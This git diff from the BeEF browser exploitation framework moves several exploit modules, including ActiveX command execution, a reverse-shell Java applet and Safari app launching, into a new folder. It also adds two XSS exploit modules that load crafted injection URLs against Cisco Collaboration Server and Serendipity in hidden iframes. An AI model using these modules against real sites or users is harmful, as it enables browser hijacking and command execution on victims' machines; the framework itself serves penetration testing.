diff --git a/modules/exploits/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
similarity index 100%
rename from modules/exploits/activex_command_execution/command.js
rename to modules/exploits/local_host/activex_command_execution/command.js
diff --git a/modules/exploits/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml
similarity index 95%
rename from modules/exploits/activex_command_execution/config.yaml
rename to modules/exploits/local_host/activex_command_execution/config.yaml
index 1e0995937..0a4d45a45 100755
--- a/modules/exploits/activex_command_execution/config.yaml
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
activex_command_execution:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.
The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]
diff --git a/modules/exploits/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb
similarity index 100%
rename from modules/exploits/activex_command_execution/module.rb
rename to modules/exploits/local_host/activex_command_execution/module.rb
diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
similarity index 100%
rename from modules/exploits/java_payload/AppletReverseTCP-0.2.jar
rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
similarity index 100%
rename from modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
similarity index 100%
rename from modules/exploits/java_payload/command.js
rename to modules/exploits/local_host/java_payload/command.js
diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml
similarity index 96%
rename from modules/exploits/java_payload/config.yaml
rename to modules/exploits/local_host/java_payload/config.yaml
index 0d58413ba..651dedb7b 100755
--- a/modules/exploits/java_payload/config.yaml
+++ b/modules/exploits/local_host/java_payload/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
java_payload:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Java Payload"
description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.
Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh
Windows Vista is not supported."
authors: ["antisnatchor"]
diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
similarity index 100%
rename from modules/exploits/java_payload/module.rb
rename to modules/exploits/local_host/java_payload/module.rb
diff --git a/modules/exploits/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
similarity index 100%
rename from modules/exploits/mozilla_nsiprocess_interface/command.js
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
diff --git a/modules/exploits/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
similarity index 96%
rename from modules/exploits/mozilla_nsiprocess_interface/config.yaml
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
index 7e1b71cd2..730bb4c79 100644
--- a/modules/exploits/mozilla_nsiprocess_interface/config.yaml
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
mozilla_nsiprocess_interface:
enable: false
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Mozilla nsIProcess XPCOM Interface (Windows)"
description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe
Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]
diff --git a/modules/exploits/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
similarity index 100%
rename from modules/exploits/mozilla_nsiprocess_interface/module.rb
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
diff --git a/modules/exploits/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js
similarity index 100%
rename from modules/exploits/safari_launch_app/command.js
rename to modules/exploits/local_host/safari_launch_app/command.js
diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml
similarity index 95%
rename from modules/exploits/safari_launch_app/config.yaml
rename to modules/exploits/local_host/safari_launch_app/config.yaml
index ba9de7df2..13200a95d 100755
--- a/modules/exploits/safari_launch_app/config.yaml
+++ b/modules/exploits/local_host/safari_launch_app/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
safari_launch_app:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Safari Launch App"
description: "Launch an application from the victim machine.
See CVE-2011-3230 for more details.
Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel."
authors: ["antisnatchor"]
diff --git a/modules/exploits/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb
similarity index 100%
rename from modules/exploits/safari_launch_app/module.rb
rename to modules/exploits/local_host/safari_launch_app/module.rb
diff --git a/modules/exploits/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js
similarity index 100%
rename from modules/exploits/window_mail_client_dos/command.js
rename to modules/exploits/local_host/window_mail_client_dos/command.js
diff --git a/modules/exploits/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml
similarity index 96%
rename from modules/exploits/window_mail_client_dos/config.yaml
rename to modules/exploits/local_host/window_mail_client_dos/config.yaml
index 891f16919..25a643768 100644
--- a/modules/exploits/window_mail_client_dos/config.yaml
+++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
windows_mail_client_dos:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Windows Mail Client DoS"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.
Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).
The protocol handler used will be: nntp."
authors: ["bcoles"]
diff --git a/modules/exploits/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb
similarity index 100%
rename from modules/exploits/window_mail_client_dos/module.rb
rename to modules/exploits/local_host/window_mail_client_dos/module.rb
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
new file mode 100644
index 000000000..81933f79a
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
+ cisco_collaboration_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
new file mode 100644
index 000000000..3320a74f6
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ cisco_collaboration_server_5_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "Cisco Collaboration Server 5 XSS"
+ description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/"
+ authors: ["bcoles", "s4squatch"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
new file mode 100644
index 000000000..f0e42f7df
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Cisco_collaboration_server_5_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'}
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
new file mode 100644
index 000000000..a20ff5bbb
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var serendipity_iframe = beef.dom.createInvisibleIframe();
+ serendipity_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
new file mode 100644
index 000000000..96d9e9bb2
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ serendipity_1_6_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "Serendipity <= 1.6 XSS"
+ description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/"
+ authors: ["bcoles", "Stefan Schurtz"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
new file mode 100644
index 000000000..cf46a83d1
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Serendipity_1_6_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'}
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end